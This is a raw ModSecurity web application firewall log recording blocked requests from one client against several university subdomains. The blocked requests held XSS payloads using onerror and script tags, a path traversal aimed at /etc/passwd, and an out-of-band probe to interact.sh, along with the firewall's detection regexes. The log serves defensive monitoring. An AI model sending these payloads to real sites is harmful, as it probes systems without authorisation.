[uri "/"] [unique_id "ZO15PMCo-f0AAAnEqSwAAAAO"]
[Tue Aug 29 11:51:09.532925 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAm-MbcAAAAI"]
[Tue Aug 29 11:51:09.545227 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAkr0DsAAAAC"]
[Tue Aug 29 11:51:09.549054 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAfWOC0AAAAL"]
[Tue Aug 29 11:51:09.553147 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAhhczoAAAAd"]
[Tue Aug 29 11:51:09.554224 2023] [:error] [pid 2490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAm63KUAAAAD"]
[Tue Aug 29 11:51:09.556027 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnHQc8AAAAT"]
[Tue Aug 29 11:51:09.564478 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAnEqS4AAAAO"]
[Tue Aug 29 11:51:09.570660 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAm7m8sAAAAE"]
[Tue Aug 29 11:51:09.572224 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15PcCo-f0AAAmOBcMAAAAU"]
[Tue Aug 29 11:51:09.579462 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnCKxYAAAAK"]
[Tue Aug 29 11:51:09.590242 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnEqS8AAAAO"]
[Tue Aug 29 11:51:10.714432 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAjtdFYAAAAX"]
[Tue Aug 29 11:51:10.743573 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAkr0D8AAAAC"]
[Tue Aug 29 11:51:10.745309 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAm-MboAAAAI"]
[Tue Aug 29 11:51:10.920000 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PsCo-f0AAAm5BwIAAAAA"]
[Tue Aug 29 11:51:10.923346 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAmNp18AAAAQ"]
[Tue Aug 29 11:51:10.938788 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAknENcAAAAB"]
[Tue Aug 29 11:51:11.063191 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PsCo-f0AAAm@5vwAAAAH"]
[Tue Aug 29 11:51:11.541428 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnCKxgAAAAK"]
[Tue Aug 29 11:51:11.543307 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAm-MbwAAAAI"]
[Tue Aug 29 11:51:11.556492 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnB5UAAAAAJ"]
[Tue Aug 29 11:51:11.571972 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAm-Mb0AAAAI"]
[Tue Aug 29 11:51:11.572677 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAmIbPIAAAAo"]
[Tue Aug 29 11:51:11.604388 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15P8Co-f0AAAm-Mb4AAAAI"]
[Tue Aug 29 11:51:12.759747 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QMCo-f0AAAmNp2MAAAAQ"]
[Tue Aug 29 11:51:12.764542 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QMCo-f0AAAmHd9QAAAAz"]
[Tue Aug 29 11:51:12.764531 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAnHQdIAAAAT"]
[Tue Aug 29 11:51:12.780912 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm-McAAAAAI"]
